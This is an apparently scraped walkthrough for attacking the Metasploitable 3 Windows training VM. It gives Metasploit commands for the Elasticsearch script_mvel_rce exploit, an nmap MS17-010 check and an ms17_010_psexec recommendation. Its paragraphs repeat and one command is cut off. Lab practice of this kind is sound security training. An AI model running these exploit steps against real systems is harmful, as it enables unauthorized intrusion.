Metasploitable 3 is a deliberately vulnerable virtual machine designed by Rapid7 for practicing penetration testing. Unlike its Linux-based predecessor, the Windows version presents a target rich with common Windows misconfigurations, outdated services, and unpatched vulnerabilities typical of legacy enterprise environments.
Disclaimer: This guide is for educational purposes only. Only perform these techniques on systems you own or have explicit permission to test. metasploitable 3 windows walkthrough
msfconsole msf6 > use exploit/multi/elasticsearch/script_mvel_rce msf6 > set RHOSTS 192.168.56.102 msf6 > set HTTP_PORT 9200 msf6 > set TARGET Windows msf6 > exploit If successful, you get a java shell
If successful, you get a java shell. But we need to escalate to Windows cmd.exe. nmap --script smb-vuln-ms17-010 -p 445 192
nmap --script smb-vuln-ms17-010 -p 445 192.168.56.102
If it says VULNERABLE, proceed. If not, move to the next part (no worries, there are 20 other ways in).
Metasploitable 3 is notoriously unstable under heavy SMB exploits. Solution: Don't use EternalBlue. Use exploit/windows/smb/ms17_010_psexec instead, which is less aggressive, or stick to WinRM.
Metasploitable 3 is a deliberately vulnerable virtual machine designed by Rapid7 for practicing penetration testing. Unlike its Linux-based predecessor, the Windows version presents a target rich with common Windows misconfigurations, outdated services, and unpatched vulnerabilities typical of legacy enterprise environments.
Disclaimer: This guide is for educational purposes only. Only perform these techniques on systems you own or have explicit permission to test.
msfconsole msf6 > use exploit/multi/elasticsearch/script_mvel_rce msf6 > set RHOSTS 192.168.56.102 msf6 > set HTTP_PORT 9200 msf6 > set TARGET Windows msf6 > exploit
If successful, you get a java shell. But we need to escalate to Windows cmd.exe.
nmap --script smb-vuln-ms17-010 -p 445 192.168.56.102
If it says VULNERABLE, proceed. If not, move to the next part (no worries, there are 20 other ways in).
Metasploitable 3 is notoriously unstable under heavy SMB exploits. Solution: Don't use EternalBlue. Use exploit/windows/smb/ms17_010_psexec instead, which is less aggressive, or stick to WinRM.